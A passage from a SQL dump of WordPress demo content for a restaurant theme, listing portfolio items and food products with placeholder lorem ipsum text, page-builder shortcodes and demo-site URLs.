tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','tuna-salad','','','2018-08-07 10:44:07','2018-08-07 10:44:07','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=648',0,'portfolio-item','',0),(3089,1,'2018-08-07 10:43:08','2018-08-07 10:43:08','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus.[/vc_column_text][/vc_column][/vc_row]','Red Dream','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','red-dream','','','2018-08-07 10:43:08','2018-08-07 10:43:08','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=649',0,'portfolio-item','',0),(3090,1,'2018-08-07 10:56:23','2018-08-07 10:56:23','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus.[/vc_column_text][/vc_column][/vc_row]','Green Magic','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','green-magic','','','2018-08-07 10:56:23','2018-08-07 10:56:23','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=659',0,'portfolio-item','',0),(3091,1,'2018-08-07 10:58:15','2018-08-07 10:58:15','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Ice Dream','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','ice-dream','','','2018-08-07 10:58:15','2018-08-07 10:58:15','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=660',0,'portfolio-item','',0),(3092,1,'2018-08-07 13:00:43','2018-08-07 13:00:43','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Chocolate Sphere','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','chocolate-sphere','','','2018-08-07 13:00:43','2018-08-07 13:00:43','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=671',0,'portfolio-item','',0),(3093,1,'2018-08-07 13:01:17','2018-08-07 13:01:17','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus.[/vc_column_text][/vc_column][/vc_row]','Strawberry Sauce','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','strawberry-sauce','','','2018-08-07 13:01:17','2018-08-07 13:01:17','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=672',0,'portfolio-item','',0),(3094,1,'2018-08-07 13:02:02','2018-08-07 13:02:02','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Spanish Kiss','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','spanish-kiss','','','2018-08-07 13:02:02','2018-08-07 13:02:02','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=673',0,'portfolio-item','',0),(3095,1,'2018-08-10 09:09:15','2018-08-10 09:09:15','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus.[/vc_column_text][/vc_column][/vc_row]','Appetizer','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','appetizer','','','2018-08-10 09:09:15','2018-08-10 09:09:15','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=933',0,'portfolio-item','',0),(3096,1,'2018-08-10 09:38:08','2018-08-10 09:38:08','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Brunch Bunch','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','brunch-bunch','','','2018-08-10 09:38:08','2018-08-10 09:38:08','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=934',0,'portfolio-item','',0),(3097,1,'2018-08-10 09:37:10','2018-08-10 09:37:10','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit.[/vc_column_text][/vc_column][/vc_row]','Romantic Dinner','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','romantic-dinner','','','2018-08-10 09:37:10','2018-08-10 09:37:10','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=935',0,'portfolio-item','',0),(3098,1,'2018-08-10 09:53:27','2018-08-10 09:53:27','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.[/vc_column_text][/vc_column][/vc_row]','Taste of Love','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','taste-of-love','','','2018-08-10 09:53:27','2018-08-10 09:53:27','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=936',0,'portfolio-item','',0),(3099,1,'2018-08-13 08:30:37','2018-08-13 08:30:37','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus.[/vc_column_text][/vc_column][/vc_row]','Home Salad','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','home-salad','','','2018-08-13 08:30:37','2018-08-13 08:30:37','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=1019',0,'portfolio-item','',0),(3100,1,'2018-08-13 08:19:59','2018-08-13 08:19:59','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.[/vc_column_text][/vc_column][/vc_row]','Vegetable Cream Soup','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','vegetable-cream-soup','','','2018-08-13 08:19:59','2018-08-13 08:19:59','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=1022',0,'portfolio-item','',0),(3101,1,'2018-08-13 08:35:07','2018-08-13 08:35:07','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Sushi','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','sushi','','','2018-08-13 08:35:07','2018-08-13 08:35:07','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=1047',0,'portfolio-item','',0),(3102,1,'2018-08-13 08:35:37','2018-08-13 08:35:37','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus.[/vc_column_text][/vc_column][/vc_row]','Garden Salad','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','garden-salad','','','2018-08-13 08:35:37','2018-08-13 08:35:37','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=1048',0,'portfolio-item','',0),(1685,1,'2018-08-20 10:30:38','2018-08-20 10:30:38','[vc_row css=\".vc_custom_1532952122446{padding-top: 15px !important;}\"][vc_column][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh et.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','Our goal & history','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.','publish','open','open','','our-goal-history','','','2018-08-20 10:30:38','2018-08-20 10:30:38','',0,'http://attika.mikado-themes.com/?p=1685',0,'post','',3),(3106,1,'2018-07-30 13:33:13','2018-07-30 13:33:13','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae sui aliquet nec, ullamcorper sit amet risus susin.','Garnished Shrimp','Convallis convallis tellus id interdum velit laoreet idsu donecis ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','garnished-shrimp','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=37',1,'product','',1),(3107,1,'2018-07-31 08:10:21','2018-07-31 08:10:21','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Lettuce & Beet Wraps','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','lettuce-beet-wraps','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=132',3,'product','',1),(3108,1,'2018-07-31 08:16:51','2018-07-31 08:16:51','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Vegan Charcuterie','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','vegan-charcuterie','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=143',4,'product','',1),(3109,1,'2018-07-31 08:20:26','2018-07-31 08:20:26','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Tofu Citrus Romaine','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','tofu-citrus-romaine','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=147',5,'product','',1),(3110,1,'2018-07-31 08:25:53','2018-07-31 08:25:53','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Beet Dip & Eggs','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','beet-dip-eggs','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=148',7,'product','',1),(3111,1,'2018-07-31 08:44:19','2018-07-31 08:44:19','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Ham Melt With Lettuce','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','ham-melt-with-lettuce','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=162',7,'product','',1),(3112,1,'2018-07-31 09:12:40','2018-07-31 09:12:40','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Smoked Pork Jowl','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','smoked-pork-jowl','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=185',10,'product','',2),(3113,1,'2018-07-31 09:17:13','2018-07-31 09:17:13','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Fruit Sponge Cake','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','fruit-sponge-cake','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=187',11,'product','',1),(3114,1,'2018-07-31 09:21:48','2018-07-31 09:21:48','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Fish In Fruit Sauce','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','fish-in-fruit-sauce','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=188',12,'product','',1),(3115,1,'2018-07-31 13:41:02','2018-07-31 13:41:02','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Lime Juice Salad','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','lime-juice-salad','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=271',13,'product','',1),(3116,1,'2018-07-31 13:47:27','2018-07-31 13:47:27','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Tuna & Avocado BLT','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','tuna-avocado-blt','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=284',14,'product','',1),(3117,1,'2018-07-31 13:55:30','2018-07-31 13:55:30','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Broccoli Cremesoup','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','broccoli-cremesoup','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=285',15,'product','',1),(3118,1,'2018-07-31 14:06:56','2018-07-31 14:06:56','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','SeaWeed Risotto','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','seaweed-risotto','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=286',17,'product','',1),(3119,1,'2018-07-31 14:06:59','2018-07-31 14:06:59','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Sushi Tuna Maki','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','sushi-tuna-maki','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=287',16,'product','',1),(3120,1,'2018-07-31 14:12:11','2018-07-31 14:12:11','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Tofu Fungi Cake','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc.','publish','open','closed','','tofu-fungi-cake','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=288',18,'product','',1),(3121,1,'2018-07-31 14:13:36','2018-07-31 14:13:36','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus.','Antipasto With Radish','Convallis convallis tellus id interdum velit laoreet id donec ultrices, 